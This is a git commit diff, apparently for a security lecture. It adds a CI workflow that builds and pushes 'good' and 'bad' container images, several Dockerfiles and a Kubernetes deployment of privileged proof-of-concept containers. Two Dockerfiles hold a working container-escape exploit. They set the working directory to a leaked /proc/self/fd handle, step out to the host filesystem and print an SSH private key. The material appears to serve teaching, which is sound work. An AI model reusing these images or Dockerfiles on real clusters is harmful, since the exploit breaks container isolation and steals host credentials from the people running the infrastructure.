feature: adding images , pipeline and deploy spec for elcture 8

.github/workflows/publish-image-minime.yml

@@ -3,7 +3,6 @@ on:
   push:
     branches:
       - main 
-      - features/workloadid
   pull_request:
 
 env:

.github/workflows/publish-image-poison.yml

@@ -0,0 +1,49 @@
+name: Build and push lecture5 image
+on:
+  push:
+    branches:
+      - main 
+      - features/workloadid
+  pull_request:
+
+env:
+  REGISTRY: ghcr.io
+  IMAGE_NAME: austriandatalab/minimi-kv
+
+
+jobs:
+  build-and-push-image:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: write
+      packages: write
+      security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v3
+
+
+
+      - name: Build an image from Dockerfile
+        run: |
+          cd poison
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:2.0.0 -f Dockerfile .
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:7.0.0 -f Dockerfile .
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:8.0.0 -f Dockerfile .
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:2.0.0 -f Dockerfile2 .
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:7.0.0 -f Dockerfile7 .
+          docker build -t  coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:8.0.0 -f Dockerfile8 .
+
+          
+      - name: Push the image 
+        run: |
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:2.0.0 
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:7.0.0
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:8.0.0
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:2.0.0
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:7.0.0
+          docker push coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/bad:8.0.0 
+
+      
+
+

.github/workflows/scan.yml

@@ -1,7 +1,6 @@
 name: "Code Scanning"
 
 on:
-  push:
   pull_request:
   schedule:
     - cron: '0 0 * * 1'

poison/Dockerfile

@@ -0,0 +1,2 @@
+FROM alpine
+CMD sleep 60

poison/Dockerfile2

@@ -0,0 +1,3 @@
+FROM alpine
+WORKDIR /proc/self/fd/2
+CMD cd ../../../. && touch LEAKYLEAKY && cat /home/ansible/.id_rsa_tmp && sleep 6000

poison/Dockerfile7

@@ -0,0 +1,3 @@
+FROM alpine
+WORKDIR /proc/self/fd/7
+CMD cd ../../../. && touch LEAKYLEAKY && cat /home/ansible/.id_rsa_tmp && sleep 6000

poison/deploy.yaml

@@ -0,0 +1,31 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: poc-deployment
+  namespace: poc
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: poc
+  template:
+    metadata:
+      labels:
+        app: poc
+    spec:
+      containers:
+      - name: poc2
+        image: coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:2.0.0
+        imagePullPolicy: Always
+        securityContext:
+          privileged: true
+      - name: poc7
+        image: coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:7.0.0
+        imagePullPolicy: Always
+        securityContext:
+          privileged: true
+      - name: poc8
+        image: coreharbor.caas-0026.dev.austrianopencloudcommunity.org/constanze/good:8.0.0
+        imagePullPolicy: Always
+        securityContext:
+          privileged: true